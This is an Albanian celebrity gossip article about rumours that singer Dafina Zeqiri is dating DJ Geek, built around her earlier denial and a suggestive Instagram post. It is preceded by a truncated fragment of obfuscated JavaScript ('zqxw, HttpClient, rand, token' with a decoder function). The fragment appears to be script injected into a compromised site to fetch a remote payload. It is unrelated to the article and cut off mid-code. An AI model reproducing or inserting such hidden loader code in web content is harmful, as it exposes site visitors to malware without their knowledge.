;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Dafina konfirmon romancën e shumëpërfolur me këtë postim?

By

Ka tash e një kohë që Dafina Zeqiri përflitet për një romancë të mundshme me DJ-in e saj, DJ Geek.

Kjo, nisur nga fakti se dyshja janë treguar në vazhdimësi tejet të afërt e të pandarë që prej kur këngëtarja u rikthye me kohë të plotë në Kosovë pas një periudhe të qëndrimit dhe punës përtej oqeanit, në Amerikë.

Vetë protagonistët nuk janë prononcuar shumë në lidhje me këtë spekulim, përjashto një deklaratë të Dafinës për Class gjatë verës në të cilën mohonte romancën.

“Jo, nuk jam në lidhje me DJ Geek. Kanë qarkulluar, po ashtu, lajme se kam qenë në lidhje me Pëllumb Citakun (menaxherin e kompanisë Moneyz), i cili është djali i dajës. Kam 5 djem në ekip dhe jemi shumë të afërt me njëri-tjetrin, kuptohet si familje. Jemi bashkë pothuajse 24/7. Unë mbetem single dhe e vetmuar (qesh). U bë disa kohë që jam single dhe të them të drejtën, kurrë s`kam qenë më e lumtur”, ishte shprehur Dafina.

Megjithatë, të paktën një postim i saj sot nuk përkon me një realitet të tillë.

Ajo ka postuar një fotografi të saj në skenë dhe DJ Geek në set nën mbishkrimin përkëdhelës ‘po të shoh, baby’ dhe një emoji i cili përdoret vetëm për çiftet e dashuruar.

Kaq ka mjaftuar që ndjekësit e shumtë në Instagram ta interpretojnë këtë si një konfirmim të lidhjes së dashurisë mes dyshes për të cilën flasin të gjithë për kaq kohë, përpos vetë personazheve. /Prive.al

Artikuj të ngjashëm